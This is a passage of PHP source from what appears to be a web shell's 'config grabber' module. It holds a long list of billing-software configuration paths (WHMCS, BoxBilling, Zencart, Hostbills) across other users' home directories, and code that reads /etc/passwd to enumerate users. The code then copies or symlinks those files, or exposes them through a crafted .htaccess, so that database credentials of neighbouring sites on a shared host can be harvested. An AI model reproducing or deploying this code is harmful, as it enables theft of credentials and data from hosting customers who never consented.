"/home5/$user_x140/public_html/Whm/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/whm/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/HOST/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Host/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/host/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/SUPPORTES/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Supportes/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/supportes/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/domains/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/domain/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Hosting/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/HOSTING/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/hosting/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/CART/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Cart/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/cart/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/ORDER/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Order/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/order/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/CLIENT/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Client/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/client/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Clientarea/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/clientarea/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/SUPPORT/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Support/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/support/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/BILLING/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Billing/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/billing/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/BUY/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Buy/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/buy/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/MANAGE/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Manage/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/manage/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/ClientSupport/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Clientsupport/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/clientsupport/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/CHECKOUT/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Checkout/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/checkout/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Billings/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/billings/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/BASKET/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Basket/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/basket/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/SECURE/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Secure/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/secure/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/SALES/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Sales/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/sales/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/BILL/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Bill/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/bill/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/PURCHASE/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Purchase/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/purchase/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/ACCOUNT/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Account/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/account/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/USER/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/User/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/user/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/CLIENTS/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Clients/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/clients/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Billings/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/billings/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/MY/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/My/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/my/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/secure/whm/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/secure/whmcs/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/panel/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/clientes/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/cliente/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/support/order/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/boxbilling/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/box/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/host/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/Host/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/supportes/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/support/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/hosting/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/cart/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/order/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/client/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/clients/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/cliente/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/clientes/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/billing/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/billings/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/my/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/secure/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/support/order/bb-config.php" => "BoxBilling",
"/home5/$user_x140/public_html/includes/dist-configure.php" => "Zencart",
"/home5/$user_x140/public_html/zencart/includes/dist-configure.php" => "Zencart",
"/home5/$user_x140/public_html/products/includes/dist-configure.php" => "Zencart",
"/home5/$user_x140/public_html/cart/includes/dist-configure.php" => "Zencart",
"/home5/$user_x140/public_html/shop/includes/dist-configure.php" => "Zencart",
"/home5/$user_x140/public_html/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/hostbills/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/host/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/Host/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/supportes/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/support/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/hosting/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/cart/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/order/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/client/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/clients/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/cliente/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/clientes/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/billing/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/billings/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/my/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/secure/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/public_html/support/order/includes/iso4217.php" => "Hostbills"
	    );  
	    
	    foreach($grab_config as $config => $nama_config) {
	      if($_POST['config'] == 'grab') {
	    $ambil_config = file_get_contents($config);
	    if($ambil_config == '') {
	    } else {
	    $file_config = fopen("x140_configgrab/$user_x140-$nama_config.txt","w");
	    fputs($file_config,$ambil_config);
	    }
	    }
	    if($_POST['config'] == 'symlink') {
	    @symlink($config,"x140_Symconfig/".$user_x140."-".$nama_config.".txt");
	    }
	    if($_POST['config'] == '404') {
	    $sym404=symlink($config,"x140_sym404/".$user_x140."-".$nama_config.".txt");
	    if($sym404){
	      @mkdir("x140_sym404/".$user_x140."-".$nama_config.".txt404", 0777);
	      $htaccess="Options Indexes FollowSymLinks
	    DirectoryIndex Mr403Forbidden.html
	    HeaderName Mr403Forbidden.txt
	    Satisfy Any
	    IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
	    IndexIgnore *";
	    
	    @file_put_contents("x140_sym404/".$user_x140."-".$nama_config.".txt404/.htaccess",$htaccess);
	    
	    @symlink($config,"x140_sym404/".$user_x140."-".$nama_config.".txt404/Mr403Forbidden.txt");
	    
	      }
	    
	    }
	    
              }     
	        }  if($_POST['config'] == 'grab') {
      echo "<center><a href='?path=$path/x140_configgrab'><font color=lime>Done</font></a></center>";
	        }
	        if($_POST['config'] == '404') {
  echo "<center>
	    <a href=\"x140_sym404/root/\">Symlinknya</a>
	    <br><a href=\"x140_sym404/\">Configurations</a></center>";
	        }
	         if($_POST['config'] == 'symlink') {
	    echo "<center>
	    <a href=\"x140_symconfig/root/\">Symlinknya</a>
	    <br><a href=\"x140_symconfig/\">Configurations</a></center>";
}if($_POST['config'] == 'symvhost') {
	    echo "<center>
	    <a href=\"x140_symvhost/root/\">Root Server</a>
	    <br><a href=\"x140_symvhost/\">Configurations</a></center>";
}
	        
	        
	        }else{
  echo "<form method=\"post\" action=\"\"><center>
	        </center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  echo include("/etc/passwd"); 
  echo "</textarea><br><br><center>
  <select class=\"select\" name=\"config\"  style=\"width: 450px;\" height=\"10\">
  <option value=\"grab\">Config Grab</option>
  <option value=\"symlink\">Symlink Config</option>
	        <option value=\"404\">Config 404</option>
	        <option value=\"symvhosts\">Vhosts Config Grabber</option><br><br><input type=\"submit\" value=\"Start!!\"></td></tr></center>\n";
	    };
		?></center>
